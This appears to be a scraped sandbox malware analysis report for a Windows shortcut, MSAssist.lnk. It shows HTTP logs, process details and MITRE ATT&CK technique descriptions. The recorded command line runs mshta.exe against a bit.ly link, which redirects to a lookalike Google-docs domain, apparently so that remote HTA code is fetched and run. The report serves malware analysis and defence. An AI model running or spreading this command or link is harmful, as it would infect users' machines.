2023-02-01 23:31:42 UTC	OUT	GET /35FlWc2 HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: bit.ly Connection: Keep-Alive
2023-02-01 23:31:43 UTC	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 01 Feb 2023 23:31:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 162 Cache-Control: private, max-age=90 Location: https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc= Set-Cookie: _bit=n11nvH-912f788aed2eeb8689-00B; Domain=bit.ly; Expires=Mon, 31 Jul 2023 23:31:43 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-02-01 23:31:43 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 67 65 2e 67 6f 6f 67 6c 65 64 6f 63 70 61 67 65 2e 63 6f 6d 2f 57 69 55 2b 51 36 63 67 49 45 53 6c 38 42 50 4a 2f 73 77 46 6e 79 71 58 31 75 46 69 46 69 54 79 51 59 36 79 5a 62 6e 49 4d 77 63 3d 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://page.googledocpage.com/WiU+Q6cgIESl8BPJ/swFnyqX1uFiFiTyQY6yZbnIMwc=">moved here</a></body></html>

Target ID:	0
Start time:	00:31:41
Start date:	02/02/2023
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\WINDOWS\system32\mshta.exe" https://bit.ly/35FlWc2
Imagebase:	0x7ff7a3510000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MSAssist.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\35FlWc2[1].htm

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: mshta.exePID: 6132, Parent PID: 3452

General

Chronological Activities

Disassembly

Windows Analysis Report
MSAssist.lnk